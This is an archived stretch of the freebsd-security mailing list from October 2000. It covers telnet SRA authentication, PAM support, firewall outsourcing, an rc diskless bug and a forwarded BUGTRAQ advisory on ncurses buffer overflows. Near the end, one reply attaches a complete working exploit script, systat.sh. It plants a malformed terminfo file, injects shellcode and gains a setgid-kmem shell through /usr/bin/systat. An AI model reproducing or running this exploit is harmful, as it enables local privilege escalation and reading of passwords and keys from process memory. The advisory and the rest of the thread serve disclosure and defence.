"1-800-helpIseebluescreens". > > That's esentially the same thing. Isn't it? > > I find it strange that Linux companies are peddling support for BSD systems. > > Before you know it they'll be offering support contracts for Solaris/Windows > too... > > Darren > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 22: 7: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id DC86C37B502 for ; Mon, 9 Oct 2000 22:07:04 -0700 (PDT) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id XAA16526; Mon, 9 Oct 2000 23:06:52 -0600 (MDT) Message-Id: <200010100506.XAA16526@faith.cs.utah.edu> Subject: Re: What is this and how do I control it ? To: Stanley.Hopcroft@IPAustralia.Gov.AU (Stanley Hopcroft) Date: Mon, 9 Oct 2000 23:06:52 -0600 (MDT) Cc: Security@FreeBSD.ORG, Carl.Makin@IPAustralia.Gov.AU (Carl Makin), shaddon@IPAustralia.Gov.AU In-Reply-To: from "Stanley Hopcroft" at Oct 10, 2000 01:55:03 PM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Stanley Hopcroft once said: > > Trying 10.0.100.252... > Connected to tsitc.aipo.gov.au. > Escape character is '^]'. > Trying SRA secure login: > User (anwsmh): > > What does this mean and how do I manage it ? It's exactly what it seems - it's a secure login protocol. SRA is secure RPC authentication mechanism based on diffie-hellman. What do you mean by "manage?" > This telnet client, ktelnet 0.61 seems to negotiate the telnet > authentication and encryption options by itself (!) but the FreeBSD > telnet, invoked from an rxvt does not get this distinctive SRA secure > login prompt. telnet -a will enable authentication. You can accomplish the sme thing automatically by putting: host set autologin on in your .telnetrc file > What means of authentication do they use ? SRA. > This is great, but I would like to know what is happening and how to > reliably reproduce it eg from rxvts on the same client host, from > ktelnet 0.61 on another machine. Yup. See above. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 0:58:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.mail.yahoo.com (smtp1.mail.yahoo.com [128.11.69.60]) by hub.freebsd.org (Postfix) with SMTP id B745A37B66C for ; Tue, 10 Oct 2000 00:58:37 -0700 (PDT) Received: from unknown (HELO ori) (209.88.175.222) by smtp.mail.vip.suc.yahoo.com with SMTP; 10 Oct 2000 07:58:35 -0000 X-Apparently-From: Message-ID: <092701c03299$2e617d60$2600a8c0@ori> From: "Richard Jones" To: "FreeBSD-Security" Subject: PAM help needed Date: Tue, 10 Oct 2000 11:05:01 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0924_01C032A9.EF97F8F0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0924_01C032A9.EF97F8F0 Content-Type: text/plain; charset="iso-8859-8-i" Content-Transfer-Encoding: quoted-printable Hi I already sent this mail a week ago, but no one came to my help. Doesn't anyone know this things? - If that is the case then please tell = me. Here is the mail again in the hope the FreeBSD's PAM experts among you = will lend a hand. thanks. I'm a newbie to this list so if this question has been asked please = refer me to it. In the last couple of days I've been checking the PAM state in the = FreeBSD 4.1 release. Let's see if I understand exactly how PAM works: According to what was configured to it, PAM authenticates user trying to = enter the machine.=20 In order to support the PAM control on user's authentication to the = machine, there are 2 groups of applications. group 1: Those that are responsible for authenticating users (such as: = login, sshd, su, and others), are supposed to have a section (probably = ifdefed) that uses PAM to authenticate the user instead of the standard = way it uses. For instance: login can use something other then the usual = unix password to authenticate users. group 2: Those that are responsible for the actual authentication (such = as: simple unix, radius, tacplus, etc.). This application don't require = the libpam module support. The libpam itself looks very good, with a lot = of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.).=20 Please correct me if I'm wrong. After walking through the FreeBSD sources I saw that: 1. none of the first group applications (except: login) has the support = for PAM authentication (ifdefed). 2. sshd support for PAM: I saw that there was a discussion in this = mailing list about this subject. there was a suggestion to change the = makefile to use libcrypt. does it mean the ssh-pam interaction works = after this change? My questions are: a. Is any of my assumptions/conclusions wrong? b. Is there any work done on the subject to fix it? c. How stable is PAM on FreeBSD? d. Any known problems that you know from your experience? e. Any helpful suggestions? f. I'm especially interested in PAM for using for group 1 (login and = SSH) and for group 2 (radius, tacplus, unix, ssh). Does anyone have any = experience with using them through PAM? sorry for this long mail (I'll keep track of the mailing list from now = on so this is a one timer). thanks in advance for all your help RJ. ------=_NextPart_000_0924_01C032A9.EF97F8F0 Content-Type: text/html; charset="iso-8859-8-i" Content-Transfer-Encoding: quoted-printable
Hi
 
I already sent this mail a week ago, but no one came to my = help.
Doesn't anyone know this things? - If that is the case = then=20 please tell me.
Here is the mail again in the hope the FreeBSD's PAM = experts=20 among you will lend a hand.
thanks.
 
I'm a newbie to this list = so if this=20 question has been asked please refer me to it.
 
In the last couple of = days I've been=20 checking the PAM state in the FreeBSD 4.1 release.
 
Let's see if I understand = exactly=20 how PAM works:
According to what was = configured to=20 it, PAM authenticates user trying to enter the machine.
In order to support the = PAM control=20 on user's authentication to the machine, there are 2 groups of=20 applications.
group 1: Those that are = responsible=20 for authenticating users (such as: login, sshd, su, and others), are = supposed to=20 have a section (probably ifdefed) that uses PAM to authenticate the user = instead=20 of the standard way it uses. For instance:=20 login can use something other then the usual unix password to = authenticate=20 users.
 
group 2: Those that are = responsible=20 for the actual authentication (such as: simple unix, radius, tacplus,=20 etc.). This application don't require the libpam module=20 support. The libpam itself looks very good, with a lot of useful = modules=20 (unix, radius, tacplus, skey, kerberos, ssh, etc.). 
 
Please correct me if I'm=20 wrong.
 
After walking through the = FreeBSD=20 sources I saw that:
1. none of the first = group=20 applications (except: login) has the support for PAM authentication=20 (ifdefed).
2. sshd support for PAM: = I saw that=20 there was a discussion in this mailing list about this subject. there = was a=20 suggestion to change the makefile to use libcrypt. does it mean the = ssh-pam=20 interaction works after this change?
 
 
My questions = are:
a. Is any of my=20 assumptions/conclusions wrong?
b. Is there any work done = on the=20 subject to fix it?
c. How stable is PAM on=20 FreeBSD?
d. Any known problems = that you know=20 from your experience?
e. Any helpful=20 suggestions?
f. I'm especially = interested in PAM=20 for using for group 1 (login and SSH) and for group 2 (radius, tacplus, = unix,=20 ssh). Does anyone have any experience with using them through = PAM?
 
 
sorry for this long mail = (I'll keep=20 track of the mailing list from now on so this is a one = timer).
 
thanks in advance for all = your=20 help
 
RJ.
------=_NextPart_000_0924_01C032A9.EF97F8F0-- _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 1:48:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 72FDA37B503 for ; Tue, 10 Oct 2000 01:48:20 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id PAA40674; Tue, 10 Oct 2000 15:47:38 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 10 Oct 2000 15:47:37 +0700 (NSS) From: Max Khon To: Richard Jones Cc: FreeBSD-Security Subject: Re: PAM help needed In-Reply-To: <092701c03299$2e617d60$2600a8c0@ori> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 10 Oct 2000, Richard Jones wrote: > Let's see if I understand exactly how PAM works: > According to what was configured to it, PAM authenticates user trying > to enter the machine. > In order to support the PAM control on user's authentication to the > machine, there are 2 groups of applications. > group 1: Those that are responsible for authenticating users (such > as: login, sshd, su, and others), are supposed to have a section > (probably ifdefed) that uses PAM to authenticate the user instead of the > standard way it uses. For instance: login can use something other then > the usual unix password to authenticate users. > > group 2: Those that are responsible for the actual authentication (such > as: simple unix, radius, tacplus, etc.). This application don't require > the libpam module support. The libpam itself looks very good, with a lot > of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.). actually there are applications that can authenticate via PAM (group 1) using libpam. The method of authentication is controlled via /etc/pam.conf. libpam reads this file and loads appropriate PAM modules that do authentication. Each PAM module does authentication in its own way. It is possible, for example, to use smb server, or to use RADIUS server for this. > After walking through the FreeBSD sources I saw that: > 1. none of the first group applications (except: login) has the support > for PAM authentication (ifdefed). login is built with PAM by default. ftpd also has PAM support > My questions are: > a. Is any of my assumptions/conclusions wrong? > b. Is there any work done on the subject to fix it? > c. How stable is PAM on FreeBSD? > d. Any known problems that you know from your experience? I do not know of any problems with PAM under FreeBSD. Seems that FreeBSD PAM library is taken without any significant modifications from Linux PAM 0.65 distribution. PAM modules were written from scratch by John Polstra . I think you can ask Mark Murray about PAM support in FreeBSD. /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 2:36: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [212.119.162.4]) by hub.freebsd.org (Postfix) with ESMTP id 719E137B503 for ; Tue, 10 Oct 2000 02:35:57 -0700 (PDT) Received: from eltex.ru (eltex-gw2.nw.ru [195.19.203.86] (may be forged)) by hosting.doublesquare.com (8.9.3/8.9.3) with ESMTP id NAA24490 for ; Tue, 10 Oct 2000 13:30:21 +0400 (MSD) From: ark@eltex.ru Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by eltex.ru (8.9.3/8.9.3) with SMTP id SAA42049; Mon, 9 Oct 2000 18:50:46 +0400 (MSD) Received: by yaksha.eltex.ru (ssmtp TIS-0.6alpha, 19 Jan 2000); Mon, 9 Oct 2000 18:47:35 +0400 Received: from undisclosed-intranet-sender id xma023656; Mon, 9 Oct 00 18:47:15 +0400 Date: Mon, 9 Oct 2000 18:48:12 +0400 Message-Id: <200010091448.SAA28341@paranoid.alpha.int> In-Reply-To: from "David Talkington " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Check Point FW-1 To: dtalk@prairienet.org Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Outsource it all, then. David Talkington said : > > >What is really the difference is being able to dial 1-800-FIREWALL and > >have someone help you out, etc. > >Darren > > Yeah, I wonder if my (item b) instinct was unfair. David Pick > mentioned herein the possibility that the company might not even WANT > the expertise to be in-house, and while his scenario was pretty ugly, > it suggests a more benign one ... if the company goes with an > open-source solution, and you're the only one on staff who knows how > to use it, they are then dependent on your talent. Great for you, but > bad for them, if turnover is high. At least a purchased solution > ensures some kind of support no matter who leaves the company. > > Your thoughts on this? Seems like a valid concern, and not one that I > had considered. (Perhaps I'm naive ... ) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQCVAwUBOeHaq6H/mIJW9LeBAQEb9gQAim4q5GrP90eT7p9wacSS986UbBimctRK uIiiWBLwQF1ZqYyCPWlwsIaSlEvwjPr7cb5+EaT+CNabVHa1S77vdI1g/tCRZcIZ Xn+C2O+6uGQFwTqTfza5NyTD73X/HlNAQ6RczvGJJN0dIyNBonfIIdBS25lCglro 42zMWel+aEg= =38ic -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 4:23:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from postman.lipetsk.ru (postman.lipetsk.ru [195.34.224.68]) by hub.freebsd.org (Postfix) with ESMTP id 40C5F37B66C for ; Tue, 10 Oct 2000 04:23:25 -0700 (PDT) Received: from lstu by relay.lipetsk.ru with UUCP id ; Tue, 10 Oct 2000 15:23:05 +0400 Received: from corsair.stu.lipetsk.ru (root@corsair.lstu [192.168.15.51]) by maverick.stu.int (8.9.3/8.8.5) with ESMTP id PAA54978 for Tue, 10 Oct 2000 15:14:25 +0400 (MSD) Received: from skynick (root@loopback [127.0.0.1]) by corsair.stu.lipetsk.ru (8.9.3/8.9.2) with SMTP id PAA94948 for ; Tue, 10 Oct 2000 15:14:25 +0400 (MSD) (envelope-from skynick@stu.lipetsk.su) Message-ID: <00bb01c032ab$3ee9ccc0$131fa8c0@skynick> From: "Nick A. Leuta" To: "FreeBSD-Security" References: Subject: Re: PAM help needed Date: Tue, 10 Oct 2000 15:13:32 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Max Khon wrote: > On Tue, 10 Oct 2000, Richard Jones wrote: > > After walking through the FreeBSD sources I saw that: > > 1. none of the first group applications (except: login) has the support > > for PAM authentication (ifdefed). > > login is built with PAM by default. ftpd also has PAM support The same needed in sshd, su, lock etc... > > My questions are: > > a. Is any of my assumptions/conclusions wrong? > > b. Is there any work done on the subject to fix it? > > c. How stable is PAM on FreeBSD? > > d. Any known problems that you know from your experience? > I do not know of any problems with PAM under FreeBSD. > Seems that FreeBSD PAM library is taken without any > significant modifications from Linux PAM 0.65 distribution. Yes, it's true. But unlike FreeBSD, under Linux RH 6.x distribution all applications like login, passwd, su, vlock, xdm, xlock, xscreensaver (in /etc/pam.d also mentioned shutdown, xsaver...) using pam. ...Do FreeBSD's pam_* modules realize all known (auth, account, session, password) "module-types"? --- SkyNick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 5:16: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from rnocserv.urc.ac.ru (rnocserv.urc.ac.ru [193.233.85.2]) by hub.freebsd.org (Postfix) with ESMTP id 2111837B66C; Tue, 10 Oct 2000 05:15:23 -0700 (PDT) Received: from urc.ac.ru (belle.rnoc.urc.ac.ru [193.233.85.10]) by rnocserv.urc.ac.ru (8.11.0/8.11.0) with ESMTP id e9ACEv519059; Tue, 10 Oct 2000 18:14:59 +0600 (YEKST) (envelope-from anton@urc.ac.ru) Message-ID: <39E30840.53E8D667@urc.ac.ru> Date: Tue, 10 Oct 2000 18:14:56 +0600 From: Anton Voronin Organization: URC FREEnet X-Mailer: Mozilla 4.74 [ru ] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: stable@freebsd.org Cc: security@freebsd.org Subject: rc & diskless bug Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! /etc/rc checks $1 against "autoboot" after it runs /etc/rc.diskless1. But as the latter uses "set" command, it clears the command line, and so /etc/rc fails to check for autoboot mode, so it doesn't run fsck, and so fails to mount local filesystems (for example, I have /tmp mounted locally). Regards, Anton -- Anton Voronin Ural Regional Center of FREEnet, Southern Ural State University, Chelyabinsk, Russia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7: 3:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id AEEA637B503 for ; Tue, 10 Oct 2000 07:03:47 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA14295 for ; Tue, 10 Oct 2000 07:03:39 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda14291; Tue Oct 10 07:03:32 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e9AE3W405628 for ; Tue, 10 Oct 2000 07:03:32 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdwT5625; Tue Oct 10 07:03:19 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e9AE3Ir08713 for ; Tue, 10 Oct 2000 07:03:18 -0700 (PDT) Message-Id: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdAT8692; Tue Oct 10 07:02:31 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: ncurses buffer overflows (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Mime-Version: 1.0 Content-Transfer-Encoding: quoted-printable Date: Tue, 10 Oct 2000 07:02:30 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you who don't subscribe to BUGTRAQ, here's a heads up. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC = ------- Forwarded Message [headers deleted] Message-ID: Date: Mon, 9 Oct 2000 22:42:49 +0300 Reply-To: =3D?iso-8859-1?Q?Jouko_Pynn=3DF6nen?=3D Sender: Bugtraq List From: =3D?iso-8859-1?Q?Jouko_Pynn=3DF6nen?=3D Subject: ncurses buffer overflows To: BUGTRAQ@SECURITYFOCUS.COM X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by = passer.osg.gov.bc.ca id e99LWVm00922 Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Mon, 09 Oct 2000 14:32:31 -0700 Resent-From: Cy Schubert X-MIME-Autoconverted: from 8bit to quoted-printable by = passer.osg.gov.bc.ca id e99LXWh00934 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by cwsys.cwsent.com = id e99LXpR01317 OVERVIEW The CRT screen handling library ncurses contains buffer overflows, making programs using it vulnerable. If the programs are setuid or setgid, a local user may elevate their privilege. The problem exists in ncurses versions 4.2 and 5.0, probably earlier, and libocurses. The overflows can be exploited if the library implementation supports loading of user defined terminfo files from ~/.terminfo. The problem has been tested and found on * SuSE Linux 6.4, Red Hat Linux 6.1. A setuid program using ncurses ("cda" in the xmcd package) was successfully exploited to spawn a root shell. * FreeBSD, the program /usr/bin/systat is setgid and uses libncurses. An exploit was made which gives a shell with egid=3Dkmem. The kmem group has read access to /dev/kmem and memory of all processes via /proc//mem, and could be used to read e.g. crypted or cleartext passwords, authorization keys, or any other info that might be in programs' memory space. * OpenBSD, having /usr/bin/systat setgid kmem too. No test exploit was made, but the program segfaults when given an "evil" terminfo file. Making a similar exploit is probably possible. This applies to other BSD systems as well, but haven't been tested or confirmed. All programs using ncurses aren't necessarily vulnerable, e.g. "screen" is setuid root on some systems and uses ncurses, but it doesn't seem to use the vulnerable functions at least directly (investigated on Red Hat Linux, other systems may vary). When using telnet to connect to a remote system, telnetd on some platforms doesn't ignore TERMINFO_DIRS or TERMCAP environment variables (e.g. OpenBSD). This means the problem could be remotely exploitable under some conditions on some platforms. This hasn't been confirmed with an exploit, however by setting TERMCAP the OpenBSD telnetd can be made read any file as root. If the file is something like /dev/zero, the telnetd process reads it infinitely until the system runs out of memory. BUG DETAILS The file ncurses/tty/lib_mvcur.c contains functions for moving around the cursor. Some of the functions contain calls to strcpy() without bound checking. The target of the strcpy's is a local fixed size buffer in onscreen_mvcur(): static inline int onscreen_mvcur(int yold,int xold,int ynew,int xnew, bool ovw) /* onscreen move from (yold, xold) to (ynew, xnew) */ { char use[OPT_SIZE], *sp; =2E.. a few lines later: sp =3D tparm(SP->_address_cursor, ynew, xnew); if (sp) { tactic =3D 0; (void) strcpy(use, sp); The function tparm() returns a control string for screen manipulation, originating from the terminfo file read according to the environment variables TERM and TERMINFO_DIRS. Even though ncurses implementations on some platforms reportedly ignore TERMINFO_DIRS while running setuid/setgid, they check ~/.terminfo/ for the capability files in any case. OPT_SIZE seems to be defined as 512. tparm() can be made return a string of arbitrary length containing arbitrary data, so exploitation is usually quite trivial. There are a few of similar strcpy() calls in other functions in the file. Many other ncurses functions may also call the cursor moving functions (e.g. endwin()) so in order to be vulnerable, a program needn't call mvcur(). SOLUTION The authors of ncurses and OS vendors have been informed over a week ago and they have, or will release fix packages shortly. TEMPORARY WORKAROUND A temporary solution is to remove the setuid/setgid bits of programs using ncurses. To check if a program uses ncurses, type (on most systems): ldd /path/to/program If libncurses or libocurses is mentioned in the library listing and the program is setuid/setgid, then there's a possibility for it to be exploited. If 'ldd' doesn't exist on the system (or the program is statically linked) you can try something like grep -li TERMINFO /path/to/program If it outputs the file path, the program probably uses ncurses or derivative. To remove the setuid/setgid bits, issue the command: chmod ug-s /path/to/file CREDITS AND ACKNOWLEDGEMENTS Vulnerability discovered by: Jouko Pynn=F6nen Thanks and greets to: Emil Valsson (for providing a FreeBSD test box), Esa Etel=E4vuori, ncurses people, cc-opers@IRCNet - -- Jouko Pynn=F6nen Online Solutions Ltd Secure your Linux - jouko@solutions.fi http://www.secmod.com ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7: 5:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 16F0537B503 for ; Tue, 10 Oct 2000 07:05:48 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA51626; Tue, 10 Oct 2000 21:04:53 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 10 Oct 2000 21:04:53 +0700 (NSS) From: Max Khon To: "Nick A. Leuta" Cc: FreeBSD-Security Subject: Re: PAM help needed In-Reply-To: <00bb01c032ab$3ee9ccc0$131fa8c0@skynick> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Tue, 10 Oct 2000, Nick A. Leuta wrote: > > > My questions are: > > > a. Is any of my assumptions/conclusions wrong? > > > b. Is there any work done on the subject to fix it? > > > c. How stable is PAM on FreeBSD? > > > d. Any known problems that you know from your experience? > > I do not know of any problems with PAM under FreeBSD. > > Seems that FreeBSD PAM library is taken without any > > significant modifications from Linux PAM 0.65 distribution. > > Yes, it's true. But unlike FreeBSD, under Linux RH 6.x distribution all > applications like login, passwd, su, vlock, xdm, xlock, xscreensaver (in > /etc/pam.d also mentioned shutdown, xsaver...) using pam. to support passwd we should add support for this to our modules. Seems that nobody really wanted to have such functionality (I haven't seen patches for this). same thing with su. do not know about X stuff. > ...Do FreeBSD's pam_* modules realize all known (auth, account, session, > password) "module-types"? no. most modules implement only auth (and some of them implement account) module types /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7: 8:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178]) by hub.freebsd.org (Postfix) with SMTP id 2B79137B66E for ; Tue, 10 Oct 2000 07:07:55 -0700 (PDT) Received: (qmail 21794 invoked from network); 10 Oct 2000 14:08:00 -0000 Received: from lagoon.freebsd.lublin.pl (qmailr@212.182.115.11) by yeti.ismedia.pl with SMTP; 10 Oct 2000 14:08:00 -0000 Received: (qmail 5703 invoked from network); 10 Oct 2000 14:08:03 -0000 Received: from riget.scene.pl (qmailr@212.182.115.2) by lagoon.freebsd.lublin.pl with SMTP; 10 Oct 2000 14:08:03 -0000 Received: (qmail 35965 invoked by uid 1001); 10 Oct 2000 14:07:37 -0000 Date: Tue, 10 Oct 2000 16:07:37 +0200 From: Przemyslaw Frasunek To: freebsd-security@freebsd.org Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010160736.N94343@riget.scene.pl> References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="x+6KMIRAuhnl3hBn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --x+6KMIRAuhnl3hBn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > For those of you who don't subscribe to BUGTRAQ, here's a heads up. And the exploit (in attachment). -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * --x+6KMIRAuhnl3hBn Content-Type: application/x-sh Content-Disposition: attachment; filename="systat.sh" Content-Transfer-Encoding: quoted-printable #!/bin/csh=0A=0A###########################################################= ###################=0A# (c) 2000 Przemys=B3aw Frasunek #=0A# = #=0A# FreeBSD 4.x systat gid=3Dkmem exploit= #=0A# Idea by: Jouko Pynn=F6nen #=0A# = #=0A# Dedicated to ks= m. #=0A# = #=0A# Nud= zi=B3o mi si=EA w szkole, tote=BF napisa=B3em sploita na angielskim. :) = #=0A##################################################################= ############=0A=0Acat << __EOF__ > /tmp/xx=0A#!/bin/csh=0A=0Acp /bin/csh /t= mp=0A/usr/sbin/chgrp kmem /tmp/csh=0Achmod 2755 /tmp/csh=0A__EOF__=0A=0Achm= od 755 /tmp/xx=0A=0Acat << __EOF__ > /tmp/sploitte.c=0A#include = =0A#include =0A#include =0A=0A#define OFF -400=0A#define= ALIGN 516=0A=0Along getesp(void)=0A{=0A __asm__("movl %esp, %eax\n");=0A}= =0A=0Aint main(void)=0A{=0A /* precompiled malformed terinfo binary */=0A= =0A char evilcap[] =3D=0A "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02= \x73\x63\x72\x65"=0A "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\= x49\x20\x58"=0A "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x= 65\x72"=0A "\x6d\x69\x6e\x61\x6c";=0A=0A char retbuf[5];=0A long ret =3D ge= tesp() + OFF;=0A int i;=0A=0A write(2, evilcap, sizeof(evilcap)-1);=0A for = (i=3D0;i<39;i++) write(2, "\0", 1);=0A for (i=3D0;i<86;i++) write(2, "\xff"= , 1);=0A write(2, "\0\0", 2);=0A for (i=3D0;i<750;i++) write(2, "\xff", 1);= =0A for (i=3D0;i> 8),=0A (((int)ret & 0xff0= 000) >> 16),=0A (((int)ret & 0xff000000) >> 24));=0A write(2, retbuf, 5);= =0A}=0A__EOF__=0A=0Acc -o /tmp/s /tmp/sploitte.c=0Acd $HOME=0Amkdir -p .ter= minfo/s=0Asetenv TERM screen=0A/tmp/s >& .terminfo/s/screen=0Asetenv EGG `p= erl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\= xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e= \x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01= \x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`=0A/usr/= bin/systat >& /dev/null=0Arm -f .terminfo/s/screen=0Als -la /tmp/csh=0Arm -= f /tmp/xx /tmp/s /tmp/sploitte.c=0A --x+6KMIRAuhnl3hBn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7:53:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id 81C8037B503 for ; Tue, 10 Oct 2000 07:53:10 -0700 (PDT) Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id VAA21620; Tue, 10 Oct 2000 21:50:28 +0700 